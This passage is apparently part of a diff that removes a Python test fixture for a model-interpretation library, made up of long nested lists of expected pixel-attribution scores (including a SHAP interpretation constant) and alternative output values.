0.7775525960239336, - ], - [ - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - ], - [ - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - ], - [ - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 
0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - ], - [ - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - ], - [ - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - ], - [ - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 
0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - ], - [ - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - ], - [ - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - ], - [ - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 
0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - ], - [ - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - ], - [ - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - ], - [ - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 
0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 
0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 
0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 
-                0.5717043041883806,
-                0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
-            ],
-            # The remaining rows of this scores matrix each consist of four constant
-            # segment blocks (widths 16, 16, 15, 14). In order of appearance, the row
-            # patterns, each repeated over a run of consecutive rows, are:
-            #   [0.28228141285466124] * 16 + [0.7110596409959468] * 16 + [0.5717043041883806] * 15 + [0.0] * 14
-            #   [0.17004439297432927] * 16 + [0.6232387569967188] * 16 + [0.349160393746381] * 15 + [0.37415556842308434] * 14
-            #   [0.4147847905809689] * 16 + [0.21617448369040726] * 16 + [0.4393939393939394] * 15 + [0.8667245705462266] * 14
-        ]
-    ],
-    "alternative_outputs": [
-        [
-            [1793106],
-            [1795539],
-            [1797837],
-            [1800021],
-            [1815417],
-            [1802088],
-            [1806420],
-            [1824192],
-            [1818906],
-            [1804818],
-            [1813338],
-            [1812561],
-            [1811298],
-            [1817472],
-            [1810533],
-            [1797249],
-        ]
-    ],
-}
-SUM_PIXELS_SHAP_INTERPRETATION = {
-    "scores": [
-        [
-            # Rows of this scores matrix use the same four-block layout
-            # (widths 16, 16, 15, 14). In order of appearance, the row patterns,
-            # each repeated over a run of consecutive rows, are:
-            #   [0.36599426908032084] * 16 + [0.0] * 16 + [1.0] * 15 + [0.0] * 14
-            #   [0.0] * 16 + [0.0] * 16 + [0.9044030984144017] * 15 + [0.0] * 14
-            [
-                0.0,
0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.0, 